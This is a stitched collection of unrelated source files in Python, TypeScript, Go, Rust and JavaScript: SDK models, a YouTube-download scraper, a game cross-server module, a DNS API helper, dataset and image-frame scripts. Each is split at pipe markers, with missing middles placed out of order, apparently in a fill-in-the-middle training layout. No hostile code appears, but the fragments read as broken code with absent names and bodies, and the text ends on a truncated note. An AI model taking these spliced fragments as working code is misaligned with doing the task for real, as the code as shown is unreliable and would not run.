client_raw_response = models.UsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/usages'}
| internal_paging |
youTubeCdn.ts | import { launch } from 'puppeteer'
/**
 * Gets the CDN URL of a YouTube video
*
* @param youTubeLink The YouTube link
* @returns The CDN URL
*/
export default async (youTubeLink: string): Promise<string> => {
const browser = await launch({ headless: true, args: ['--no-sandbox'] });
const page = await browser.newPage();
await page.goto('https://yt1s.com/');
await page.type('#s_input', youTubeLink);
await page.keyboard.press('Enter');
await page.waitForSelector('#btn-action');
const chosenValue = await page.evaluate(() => {
const selector = <HTMLSelectElement> document.getElementById('formatSelect');
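        // Pick the first listed format whose size is shown in KB, or whose numeric
        // size is at most 8 (presumably MB, to keep the download reasonably small).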
// skip 0th element
for(let i = 1; i < selector.options.length; i++) {
const option = selector.options[i];
            const sizeString = option.innerHTML.substring(
                option.innerHTML.indexOf('(') + 1,
                option.innerHTML.indexOf(')')
            );
const sizeStrings = sizeString.split(' ');
if (sizeStrings[1] === "KB") {
return option.value;
} else if (parseFloat(sizeStrings[0]) <= 8.0) {
return option.value; | }
// Return the last value even though the size is too great
return selector.options[selector.options.length - 1].value;
});
await page.select('select#formatSelect', chosenValue);
await page.evaluate(() => {
const actionButton = <HTMLLinkElement> document.getElementById('btn-action');
actionButton.click();
});
await page.waitForSelector('#asuccess', { visible: true });
const href = await page.evaluate(() => {
const downloader = <HTMLLinkElement> document.getElementById('asuccess');
return downloader.href;
});
await browser.close();
return href;
} | } |
svhn_provider.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Tuple, Union, Optional
from overrides import overrides, EnforceOverrides
from torch.utils.data.dataset import Dataset
import torchvision
from torchvision.transforms import transforms
from torch.utils.data import ConcatDataset
from archai.datasets.dataset_provider import DatasetProvider, register_dataset_provider, TrainTestDatasets
from archai.common.config import Config
from archai.common import utils
class SvhnProvider(DatasetProvider):
|
register_dataset_provider('svhn', SvhnProvider) | def __init__(self, conf_dataset:Config):
super().__init__(conf_dataset)
self._dataroot = utils.full_path(conf_dataset['dataroot'])
@overrides
def get_datasets(self, load_train:bool, load_test:bool,
transform_train, transform_test)->TrainTestDatasets:
trainset, testset = None, None
if load_train:
trainset = torchvision.datasets.SVHN(root=self._dataroot, split='train',
download=True, transform=transform_train)
extraset = torchvision.datasets.SVHN(root=self._dataroot, split='extra',
download=True, transform=transform_train)
trainset = ConcatDataset([trainset, extraset])
if load_test:
testset = torchvision.datasets.SVHN(root=self._dataroot, split='test',
download=True, transform=transform_test)
return trainset, testset
@overrides
def get_transforms(self)->tuple:
MEAN = [0.4914, 0.4822, 0.4465]
STD = [0.2023, 0.1994, 0.20100]
transf = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()
]
normalize = [
transforms.ToTensor(),
transforms.Normalize(MEAN, STD)
]
train_transform = transforms.Compose(transf + normalize)
test_transform = transforms.Compose(normalize)
return train_transform, test_transform |
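Note: a standalone sketch (outside the archai DatasetProvider/Config plumbing) showing the same train+extra SVHN composition with torchvision directly; the "./data" root path is an assumption.

# Reproduce the provider's train+extra concatenation using torchvision only.
import torchvision
from torchvision.transforms import transforms
from torch.utils.data import ConcatDataset

MEAN = [0.4914, 0.4822, 0.4465]
STD = [0.2023, 0.1994, 0.2010]
train_tf = transforms.Compose([
    transforms.RandomCrop(32, padding=4),
    transforms.RandomHorizontalFlip(),
    transforms.ToTensor(),
    transforms.Normalize(MEAN, STD),
])
train = torchvision.datasets.SVHN(root="./data", split="train", download=True, transform=train_tf)
extra = torchvision.datasets.SVHN(root="./data", split="extra", download=True, transform=train_tf)
trainset = ConcatDataset([train, extra])
print(len(trainset))  # 73,257 train + 531,131 extra = 604,388 images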
cross.go | package logic
import (
"context"
"errors"
centertypes "fgame/fgame/center/types"
"fgame/fgame/common/lang"
"fgame/fgame/common/message"
"fgame/fgame/core/session"
grpcsession "fgame/fgame/core/session/grpc"
grpcpb "fgame/fgame/core/session/grpc/pb"
"fgame/fgame/game/center/center"
gamecodec "fgame/fgame/game/codec"
"fgame/fgame/game/cross/cross"
crosseventtypes "fgame/fgame/game/cross/event/types"
"fgame/fgame/game/cross/pbutil"
playercross "fgame/fgame/game/cross/player"
crosssession "fgame/fgame/game/cross/session"
crosstypes "fgame/fgame/game/cross/types"
gameevent "fgame/fgame/game/event"
"fgame/fgame/game/global"
loginlogic "fgame/fgame/game/login/logic"
"fgame/fgame/game/player"
playerlogic "fgame/fgame/game/player/logic"
playertypes "fgame/fgame/game/player/types"
"fgame/fgame/game/processor"
scenelogic "fgame/fgame/game/scene/logic"
"fgame/fgame/game/scene/scene"
gamesession "fgame/fgame/game/session"
"fmt"
log "github.com/Sirupsen/logrus"
)
//Player enters the cross server
func PlayerEnterCross(pl player.Player, crossType crosstypes.CrossType, args ...string) {
PlayerEnterCrossWithBehavior(pl, crossType, crosstypes.CrossBehaviorTypeNormal, args...)
return
}
func PlayerEnterCrossWithBehavior(pl player.Player, crossType crosstypes.CrossType, behaviorType crosstypes.CrossBehaviorType, args ...string) {
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
tempArgs := make([]string, 0, len(args)+1)
tempArgs = append(tempArgs, fmt.Sprintf("%d", behaviorType))
tempArgs = append(tempArgs, args...)
crossManager.EnterCross(crossType, tempArgs...)
//Connect to the cross server asynchronously
connectCross(pl, crossType.GetServerType())
return
}
func PlayerTracEnterCross(pl player.Player, crossType crosstypes.CrossType, behaviorType crosstypes.CrossBehaviorType, foeId string) (flag bool) {
if !CheckBeforeEnterCross(pl, crossType) {
return
}
PlayerEnterCrossWithBehavior(pl, crossType, behaviorType, foeId)
return
}
func CheckBeforeEnterCross(pl player.Player, crossType crosstypes.CrossType) bool {
if !cross.CheckEnterCross(pl, crossType) {
return false
}
return true
}
func PlayerReenterCross(pl player.Player, crossType crosstypes.CrossType) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:用户重新进入跨服")
//Do not reconnect for these cross-server types
switch crossType {
case crosstypes.CrossTypeLianYu,
crosstypes.CrossTypeGodSiegeQiLin,
crosstypes.CrossTypeGodSiegeHuoFeng,
crosstypes.CrossTypeGodSiegeDuLong,
crosstypes.CrossTypeDenseWat,
crosstypes.CrossTypeShenMoWar:
PlayerExitCross(pl)
return
}
//Connect to the cross server asynchronously
connectCross(pl, crossType.GetServerType())
return
}
//Player exits the cross server and returns to the previous scene
func PlayerExitCross(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服数据退出")
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
crossManager.ExitCross()
crossSession := pl.GetCrossSession()
if crossSession != nil {
crossSession.Close(true)
}
}
//Player exits the cross server and returns to the previous scene
func AsyncPlayerExitCross(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("arena:跨服数据异步退出")
ctx := scene.WithPlayer(context.Background(), pl)
pl.Post(message.NewScheduleMessage(onAsyncPlayerExitCross, ctx, nil, nil))
}
func onAsyncPlayerExitCross(ctx context.Context, result interface{}, err error) error {
pl := scene.PlayerInContext(ctx)
p := pl.(player.Player)
PlayerExitCross(p)
return nil
}
var (
errorCrossConnNoFound = errors.New("跨服连接不存在")
errorCrossNoSupport = errors.New("跨服不支持")
)
//Connect to the cross server
func connectCross(pl player.Player, serverType centertypes.GameServerType) {
crossDisable := global.GetGame().CrossDisable()
if crossDisable {
err := errorCrossNoSupport
ctx := scene.WithPlayer(context.Background(), pl)
//Callback with the connection failure
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, nil, err)
pl.Post(sm)
return
}
go func() {
var err error
defer func() {
//TODO catch panic
if err != nil {
ctx := scene.WithPlayer(context.Background(), pl)
//Callback with the connection failure
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, nil, err)
//Handle on the cross-server goroutine
// cross.GetCrossService().GetCross().Post(sm)
pl.Post(sm)
}
}()
//Get the grpc connection
conn := center.GetCenterService().GetCross(serverType)
if conn == nil {
err = errorCrossConnNoFound
return
}
openHandler := session.SessionHandlerFunc(onSessionOpen)
closeHandler := session.SessionHandlerFunc(onSessionClose)
receiveHandler := session.HandlerFunc(onSessionReceive)
sendHandler := session.HandlerFunc(onSessionSend)
h := grpcsession.NewGrpcClientHandler(openHandler, closeHandler, receiveHandler, sendHandler)
cc := grpcpb.NewConnectionClient(conn)
//TODO add timeout and metadata
ctx := pl.GetContext()
ccc, err := cc.Connect(ctx)
if err != nil {
//TODO connection failed
return
}
h.Handle(ccc)
}()
}
//Cross-server connect callback
func onPlayerCrossConnect(ctx context.Context, result interface{}, err error) (rerr error) {
pl := scene.PlayerInContext(ctx)
p := pl.(player.Player)
if err != nil {
onPlayerCrossConnectFailed(p, err)
return nil
}
sess := result.(session.Session)
onPlayerCrossConnectSuccess(p, sess)
return
}
//Cross-server connection failed
func onPlayerCrossConnectFailed(pl pla | ).Warn("cross:玩家跨服,失败")
}
//TODO retry
playerlogic.SendSystemMessage(pl, lang.CrossFailed)
//Exit
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
crossManager.ExitCross()
return
}
//Cross-server connection succeeded
func onPlayerCrossConnectSuccess(pl player.Player, sess session.Session) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:玩家跨服,连接成功")
//Create the cross-server session and context
ps := crosssession.NewSendSession(sess, gamecodec.GetCodec(), nil)
nctx := crosssession.WithSendSession(pl.GetContext(), ps)
sess.SetContext(nctx)
//TODO add the player to the cross-server manager
//Set the cross-server session
pl.SetCrossSession(ps)
//TODO emit a connection-success event
//Send the login message
siLogin := pbutil.BuildSILogin(pl.GetId())
pl.SendCrossMsg(siLogin)
}
//Cross-server connection closed
// func onPlayerCrossConnectClose(ctx context.Context, result interface{}, err error) (rerr error) {
// pl := scene.PlayerInContext(ctx)
// p := pl.(player.Player)
// log.WithFields(
// log.Fields{
// "playerId": pl.GetId(),
// }).Info("cross:跨服连接关闭")
// //TODO reconnect after a passive disconnect
// //exit the cross server
// onPlayerExitCross(p)
// return
// }
var (
crossFailed = errors.New("cross failed")
)
//Session opened
func onSessionOpen(sess session.Session) (err error) {
//Attach to the player
gameS := gamesession.SessionInContext(sess.Context())
pl := gameS.Player().(player.Player)
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,对话打开")
ctx := scene.WithPlayer(context.Background(), pl)
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, sess, nil)
pl.Post(sm)
return nil
}
//Session closed
func onSessionClose(sess session.Session) (err error) {
gameS := gamesession.SessionInContext(sess.Context())
pl := gameS.Player().(player.Player)
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,对话关闭")
pl.LogoutCross()
// ctx := scene.WithPlayer(context.Background(), pl)
// sm := message.NewScheduleMessage(onPlayerCrossConnectClose, ctx, nil, nil)
// pl.Post(sm)
// cross.GetCrossService().GetCross().Post(sm)
return nil
}
//Receive a message
func onSessionReceive(sess session.Session, msg []byte) (err error) {
return processor.GetMessageProcessor().ProcessCross(sess, msg)
}
//Send a message
func onSessionSend(sess session.Session, msg []byte) (err error) {
return nil
}
//Cross-server exit
func OnPlayerExitCross(pl player.Player, crossType crosstypes.CrossType) {
//Leave the matching state
gameevent.Emit(crosseventtypes.EventTypePlayerCrossExit, pl, crossType)
//Remove the player from the cross server
cross.GetCrossService().GetCross().RemovePlayer(pl)
if pl.IsCross() {
//Guard against a crash during exit
defer func() {
//Catch the panic
if r := recover(); r != nil {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
"error": r,
}).Error("cross:退出跨服,异常")
//Logging out
if pl.IsLogouting() {
loginlogic.Logout(pl)
} else {
pl.Close(nil)
}
return
}
//Log out
if pl.IsLogouting() {
loginlogic.Logout(pl)
}
}()
flag := pl.LeaveCross()
if !flag {
panic(fmt.Errorf("cross:退出跨服应该成功"))
}
if !pl.IsLogouting() {
scenelogic.PlayerEnterOriginScene(pl)
}
} else {
//Log out
if pl.IsLogouting() {
//Exit the scene
loginlogic.Logout(pl)
return
}
}
return
}
//Push player data
func CrossPlayerDataLogin(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,跨服数据推送")
//Exit the scene
if pl.GetScene() != nil {
//Exit the scene, marked as failed
scenelogic.PlayerExitScene(pl, true)
}
flag := pl.EnterCross()
if !flag {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Warn("cross:跨服,进入跨服失败")
se := pl.GetCrossSession()
if se != nil {
se.Close(true)
}
return
}
ctx := scene.WithPlayer(context.Background(), pl)
sm := message.NewScheduleMessage(onPlayerEnterCross, ctx, nil, nil)
cross.GetCrossService().GetCross().Post(sm)
}
func onPlayerEnterCross(ctx context.Context, result interface{}, err error) (rerr error) {
p := scene.PlayerInContext(ctx)
pl := p.(player.Player)
cross.GetCrossService().GetCross().AddPlayer(pl)
flag := pl.Cross()
if !flag {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Warn("cross:跨服,进入跨服登陆失败")
//TODO send an error code
pl.GetCrossSession().Close(true)
return
}
gameevent.Emit(crosseventtypes.EventTypePlayerCrossEnter, pl, nil)
//Push the player data
siPlayerData := pbutil.BuildSIPlayerData(pl)
//Send the player data
pl.SendCrossMsg(siPlayerData)
return
}
| yer.Player, err error) {
crossType := pl.GetCrossType()
//不管奔溃都要移除
defer OnPlayerExitCross(pl, crossType)
if err != nil {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
"err": err,
} |
common_test.go | package rbac
import (
"fmt"
"reflect"
"testing"
"github.com/rancher/norman/types"
v3 "github.com/rancher/rancher/pkg/generated/norman/management.cattle.io/v3"
rbacv1 "k8s.io/api/rbac/v1"
)
func Test_BuildSubjectFromRTB(t *testing.T) {
type testCase struct {
from interface{}
to rbacv1.Subject
iserr bool
}
userSubject := rbacv1.Subject{
Kind: "User",
Name: "tmp-user",
}
groupSubject := rbacv1.Subject{
Kind: "Group",
Name: "tmp-group",
}
saSubject := rbacv1.Subject{
Kind: "ServiceAccount",
Name: "tmp-sa",
Namespace: "tmp-namespace",
}
testCases := []testCase{
testCase{
from: nil,
iserr: true,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
UserName: userSubject.Name,
},
to: userSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
GroupName: groupSubject.Name,
},
to: groupSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
ServiceAccount: fmt.Sprintf("%s:%s", saSubject.Namespace, saSubject.Name),
},
to: saSubject,
},
testCase{
from: &v3.ClusterRoleTemplateBinding{
UserName: userSubject.Name,
},
to: userSubject,
},
testCase{
from: &v3.ClusterRoleTemplateBinding{
GroupName: groupSubject.Name,
},
to: groupSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
ServiceAccount: "wrong-format",
},
iserr: true,
},
}
for _, tcase := range testCases {
output, err := BuildSubjectFromRTB(tcase.from)
if tcase.iserr && err == nil {
t.Errorf("roletemplatebinding %v should return error", tcase.from)
} else if !tcase.iserr && !reflect.DeepEqual(tcase.to, output) {
t.Errorf("the subject %v from roletemplatebinding %v is mismatched, expect %v", output, tcase.from, tcase.to)
}
}
}
func Test_TypeFromContext(t *testing.T) | {
type testCase struct {
apiContext *types.APIContext
resource *types.RawResource
expectedType string
}
testCases := []testCase{
{
apiContext: &types.APIContext{
Type: "catalog",
},
resource: nil,
expectedType: "catalog",
},
{
apiContext: &types.APIContext{
Type: "subscribe",
},
resource: &types.RawResource{
Type: "catalog",
},
expectedType: "catalog",
},
}
for _, tcase := range testCases {
outputType := TypeFromContext(tcase.apiContext, tcase.resource)
if tcase.expectedType != outputType {
t.Errorf("resource type %s is mismatched, expect %s", outputType, tcase.expectedType)
}
}
} |
|
sub_board.rs | use super::enums::{BoardState, GameState};
use super::types::Coord;
const SIZE: usize = 3;
const MOVE_LIMIT: usize = SIZE.pow(2);
#[derive(Clone, Debug, PartialEq, Eq, Copy)]
pub struct SubBoard<T> {
board: [[T; 3]; 3],
winner: Option<BoardState>,
move_count: usize,
}
impl<T> SubBoard<T>
where
T: GameState,
{
pub fn new() -> Self {
Self {
board: [[T::default(); 3]; 3],
winner: None,
move_count: 0,
}
}
pub fn make_move(&mut self, player: T, location: Coord) {
if self.is_finished() {
panic!("Attempted to make move on finished board");
}
self.board[location.x][location.y] = player;
self.move_count += 1;
// Check if the board has been won
self.check_row(location.x);
if !self.is_finished() {
self.check_column(location.y);
}
if !self.is_finished() {
self.check_ltr_diagonal();
}
if !self.is_finished() {
self.check_rtl_diagonal();
}
// check for a tie
if !self.is_finished() && self.move_count == MOVE_LIMIT {
self.winner = Some(BoardState::Tie);
}
}
pub fn is_finished(&self) -> bool |
pub fn hash(&self) -> usize {
let mut hash = 0;
for square in self.board.iter().flatten() {
hash += square.hash_value();
hash = hash << 2;
}
hash
}
pub fn undo_move(&mut self, location: Coord) {
self.board[location.x][location.y] = T::default();
self.move_count -= 1;
self.winner = None;
}
pub fn get_valid_moves(&self) -> Vec<Coord> {
self.board
.iter()
.flatten()
.enumerate()
.filter(|(_, v)| **v == T::default())
.map(|(i, _)| Coord::new(i / 3, i % 3))
.collect()
}
pub fn is_winner(&self) -> Option<BoardState> {
self.winner
}
fn check_row(&mut self, row: usize) {
let player = self.board[row][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[row][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
/**
* Check if a given column has been won
* @param col Column index
*/
fn check_column(&mut self, col: usize) {
let player = self.board[0][col];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[i][col] {
return;
}
}
self.winner = Some(player.to_board_state())
}
fn check_ltr_diagonal(&mut self) {
let player = self.board[0][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[i][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
/**
* Check if the right to left diagonal has been won
*/
fn check_rtl_diagonal(&mut self) {
let player = self.board[SIZE - 1][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[SIZE - 1 - i][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
}
| {
self.winner.is_some()
} |
gandi_api.py | import requests
import urllib
from collections import namedtuple
from certbot.plugins import dns_common
try:
from urllib import quote # Python 2.X
except ImportError:
from urllib.parse import quote # Python 3+
_GandiConfig = namedtuple('_GandiConfig', ('api_key',))
_BaseDomain = namedtuple('_BaseDomain', ('zone_uuid', 'fqdn'))
def get_config(api_key):
return _GandiConfig(api_key=api_key)
def _get_json(response):
try:
data = response.json()
except ValueError:
return dict()
return data
def _get_response_message(response, default='<No reason given>'):
return _get_json(response).get('message', default)
def _headers(cfg):
return {
'Content-Type': 'application/json',
'X-Api-Key': cfg.api_key
}
def _get_url(*segs):
return 'https://dns.api.gandi.net/api/v5/{}'.format(
'/'.join(quote(seg, safe='') for seg in segs)
)
def _request(cfg, method, segs, **kw):
headers = _headers(cfg)
url = _get_url(*segs)
return requests.request(method, url, headers=headers, **kw)
def _get_base_domain(cfg, domain):
for candidate_base_domain in dns_common.base_domain_name_guesses(domain):
response = _request(cfg, 'GET', ('domains', candidate_base_domain))
if response.ok:
data = _get_json(response)
zone_uuid = data.get('zone_uuid')
fqdn = data.get('fqdn')
if zone_uuid and fqdn:
return _BaseDomain(zone_uuid=zone_uuid, fqdn=fqdn)
return None
def _get_relative_name(base_domain, name):
suffix = '.' + base_domain.fqdn
return name[:-len(suffix)] if name.endswith(suffix) else None
def _del_txt_record(cfg, base_domain, relative_name):
return _request(
cfg,
'DELETE',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'))
def _update_record(cfg, domain, name, request_runner):
base_domain = _get_base_domain(cfg, domain)
if base_domain is None:
return 'Unable to get base domain for "{}"'.format(domain)
relative_name = _get_relative_name(base_domain, name)
if relative_name is None:
return 'Unable to derive relative name for "{}"'.format(name)
response = request_runner(base_domain, relative_name)
return None if response.ok else _get_response_message(response)
def get_txt_records(cfg, domain, name):
base_domain = _get_base_domain(cfg, domain)
if base_domain is None:
return 'Unable to get base domain for "{}"'.format(domain)
relative_name = _get_relative_name(base_domain, name)
if relative_name is None:
return 'Unable to derive relative name for "{}"'.format(name)
response = _request(
cfg,
'GET',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'))
if response.ok:
return response.json().get('rrset_values')
else: |
def add_txt_record(cfg, domain, name, value):
def requester(base_domain, relative_name):
_del_txt_record(cfg, base_domain, relative_name)
return _request(
cfg,
'POST',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'),
json={
'rrset_values': value if isinstance(value, list) else [value]
})
return _update_record(cfg, domain, name, requester)
def del_txt_record(cfg, domain, name):
def requester(base_domain, relative_name):
return _del_txt_record(cfg, base_domain, relative_name)
return _update_record(cfg, domain, name, requester) | return [] |
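Note: a hypothetical usage sketch for the helpers above; the API key, domain, and record name are placeholders and only functions defined in this module are used.

# Placeholder values throughout.
cfg = get_config(api_key="EXAMPLE-LIVEDNS-KEY")

# Publish an ACME challenge value, read it back, then clean it up again.
err = add_txt_record(cfg, "example.com", "_acme-challenge.example.com", "challenge-token")
if err is not None:
    print("add_txt_record failed:", err)
print(get_txt_records(cfg, "example.com", "_acme-challenge.example.com"))
del_txt_record(cfg, "example.com", "_acme-challenge.example.com")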
ServiceProvider.ts | import IServiceProvider from "../../Core/Interface/IServiceProvider";
import ServiceContainer from "../../Core/ServiceContainer";
import BaseServiceProvider from "../../Core/ServiceProvider";
import Client from "./ServiceClient";
import AccessToken from "../Auth/AccessToken";
/**
* Semantic Service Provider
*/
export default class | extends BaseServiceProvider implements IServiceProvider {
public register(app: ServiceContainer) {
super._register(app);
app.setService("semantic", new Client(app, new AccessToken(app)));
return this;
}
}
| ServiceProvider |
fasterfrequentwords.py | seq = 'CTTCTCACGTACAACAAAATC'
symbol2number = {"A":0,"C":1,"G":2,"T":3}
def PatternToNumber(Pattern):
if not Pattern:
return 0
symbol = Pattern[-1]
prefix = Pattern[:-1]
return ((4*PatternToNumber(prefix))+symbol2number[symbol])
def | (index, k):
bases = ['A', 'C', 'G', 'T']
pattern = ''
for i in range(k):
pattern += bases[index % 4]
index = index // 4
return pattern[::-1]
def ComputingFrequencies(text,k):
FrequencyArray =[]
for i in range(0,((4**k))):
FrequencyArray.append(0)
for i in range(0, len(text) - k + 1):  # visit every k-mer start position
pattern = text[i:(i+k)]
j = PatternToNumber(pattern)
FrequencyArray[j] = FrequencyArray[j]+1
return FrequencyArray
def FasterFrequentWords(text,k):
FrequentPatterns = []
FrequencyArray = ComputingFrequencies(text,k)
maxCount = max(FrequencyArray)
for i in range(0,(4**k)):
if FrequencyArray[i] == maxCount:
pattern = NumberToPattern(i,k)
FrequentPatterns.append(pattern)
return FrequentPatterns
print(FasterFrequentWords("ACGCGGCTCTGAAA",2)) | NumberToPattern |
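Note: a small worked example of the base-4 k-mer encoding behind the frequency array, assuming the functions above are in scope.

# A=0, C=1, G=2, T=3, so "GT" encodes to 4*2 + 3 = 11 and index 11 decodes back to "GT".
assert PatternToNumber("GT") == 11
assert NumberToPattern(11, 2) == "GT"

# For "ACGT" and k=2 the frequency array is non-zero exactly at AC=1, CG=6, GT=11.
freqs = ComputingFrequencies("ACGT", 2)
assert [i for i, count in enumerate(freqs) if count] == [1, 6, 11]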
audit-trail.ts | /**
* Data Safe API
* APIs for using Oracle Data Safe.
* OpenAPI spec version: 20181201
*
*
* NOTE: This class is auto generated by OracleSDKGenerator.
* Do not edit the class manually.
*
* Copyright (c) 2020, 2022, Oracle and/or its affiliates. All rights reserved.
* This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
*/
import * as model from "../model";
import common = require("oci-common");
/**
* An audit trail represents the source of audit records that provides documentary evidence of
* the sequence of activities in the target database. Configuring audit trails in Data Safe, and enabling
* audit data collection on the audit trails copies the audit records from the target database's audit trail
* into the Data Safe repository.
*
*/
export interface AuditTrail {
/**
* The OCID of the audit trail.
*/
"id": string;
/**
* The OCID of the parent audit.
*/
"auditProfileId": string;
/**
* The OCID of the Data Safe target for which the audit trail is created.
*/
"targetId": string;
/**
* The display name of the audit trail.
*/
"displayName": string;
/**
* The date and time the audit trail was created, in the format defined by RFC3339.
*/
"timeCreated": Date;
/**
* The date and time the audit trail was updated, in the format defined by RFC3339.
*/
"timeUpdated": Date;
/**
* The current state of the audit trail.
*/
"lifecycleState": model.AuditTrailLifecycleState;
/**
* The current sub-state of the audit trail.
*/
"status": model.AuditTrailStatus;
/**
* Details about the current state of the audit trail in Data Safe.
*/
"lifecycleDetails"?: string;
/**
* An audit trail location represents the source of audit records that provides documentary
* evidence of the sequence of activities in the target database.
*
*/
"trailLocation"?: string;
/**
* The description of the audit trail.
*/
"description"?: string;
/**
* Indicates if auto purge is enabled on the target database, which helps delete audit data in the
* target database every seven days so that the database's audit trail does not become too large.
*
*/
"isAutoPurgeEnabled"?: boolean;
/**
* The date from which the audit trail must start collecting data, in the format defined by RFC3339.
*/
"auditCollectionStartTime"?: Date;
/**
* The OCID of the workrequest for audit trail which collects audit records.
*/
"workRequestId"?: string;
/**
* The OCID of the compartment that contains the audit trail and its same as the compartment
* of audit profile resource.
*
*/
"compartmentId": string;
/**
* Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm)
* <p>
Example: `{\"Department\": \"Finance\"}`
*
*/
"freeformTags"?: { [key: string]: string };
/**
* Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm)
* <p>
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
*
*/
"definedTags"?: { [key: string]: { [key: string]: any } };
/**
* System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see Resource Tags.
* Example: `{\"orcl-cloud\": {\"free-tier-retained\": \"true\"}}`
*
*/
"systemTags"?: { [key: string]: { [key: string]: any } }; | export function getJsonObj(obj: AuditTrail): object {
const jsonObj = { ...obj, ...{} };
return jsonObj;
}
export function getDeserializedJsonObj(obj: AuditTrail): object {
const jsonObj = { ...obj, ...{} };
return jsonObj;
}
} | }
export namespace AuditTrail { |
DynamicRoute.js | var express = require("express");
var app = express(); | app.listen(3000); |
app.get("/:id", function(req, res) {
res.send("The id you specified is " + req.params.id);
}); |
fastlane-templates.py | #!/usr/bin/env python3
#
# Retrieve templates from fastlane/frameit
#
import sys
import os
from os import path
from shutil import copyfile
from tempfile import gettempdir
import re
import json
import cv2
import numpy as np
from common import sanitize_color, sanitize_device_name, sanitize_device_key, apply_default_color
# URL to frameit-frames repository
FRAMEIT_URL = "https://github.com/fastlane/frameit-frames/archive/gh-pages.zip"
def main():
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} resource_dir contents_file")
exit(1)
resource_dir = sys.argv[1]
contents_path = sys.argv[2]
zip_path = path.join(resource_dir, "gh-pages.zip")
repo_dir = path.join(resource_dir, "frameit-frames-gh-pages")
print("Downloading frameit frames...")
status_code = os.system(f"wget -q --show-progress -O \"{zip_path}\" \"{FRAMEIT_URL}\" && unzip -d \"{resource_dir}\" \"{zip_path}\"")
print(f"Status code: {status_code}")
# path to latest frames
frameit_dir = path.join(repo_dir, "latest")
with open(contents_path, "r") as cf:
contents = json.load(cf)
for frame_path in os.listdir(frameit_dir):
frame_path = path.join(frameit_dir, frame_path)
filename = path.basename(frame_path)
if not path.isfile(frame_path) or not filename_valid(filename):
continue
device_name = sanitize_device_name(filename)
device_key = sanitize_device_key(device_name)
device_color = sanitize_color(filename)
print(f"Found template: {frame_path}")
print(f"Template {device_name} - {device_color}")
image = cv2.imread(frame_path, cv2.IMREAD_UNCHANGED) # read preserving alpha
frame_height, frame_width = image.shape[:2]
ox, oy, width, height = measure_screen_bounds(image)
print(f"==> +{ox}+{oy}, {width}x{height}")
if device_key in contents:
device_info = contents[device_key]
else:
device_info = {
"images": {},
"left": ox,
"top": oy,
"right": ox + width,
"bottom": oy + height,
"res_height": frame_height,
"res_width": frame_width
}
device_info["images"][device_color] = filename
contents[device_key] = device_info
copyfile(frame_path, path.join(resource_dir, filename))
# default colors - first model color which is available in DEFAULT_COLOR array
for key in contents.keys():
apply_default_color(contents, key)
with open(contents_path, "w") as cf:
json.dump(contents, cf, sort_keys=True, indent=4)
print("Cleaning up...")
os.system(f"rm {zip_path} && rm -r {repo_dir}")
def measure_screen_bounds(image):
alpha = image[:, :, 3]
alpha = cv2.threshold(alpha, 252, 255, cv2.THRESH_BINARY_INV)[1] # 99% threshold
# connected component analysis
n, labels, stats, centroids = cv2.connectedComponentsWithStats(alpha, connectivity=8)
# compare centroids to image center
img_center = np.array([alpha.shape[0] // 2, alpha.shape[1] // 2])
# component which contains image center should be screen
screen_label = labels[img_center[0], img_center[1]]
x, y, width, height = stats[screen_label][:4]
return int(x), int(y), int(width), int(height)
def filename_valid(filename):
|
if __name__ == "__main__":
main()
| pattern = "^Apple iP.*\.png$"
return re.search(pattern, filename) is not None |
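Note: a self-contained sanity check of the screen-detection idea in measure_screen_bounds, run on a synthetic RGBA frame instead of a downloaded frameit template, so the connected-components step can be verified in isolation.

import cv2
import numpy as np

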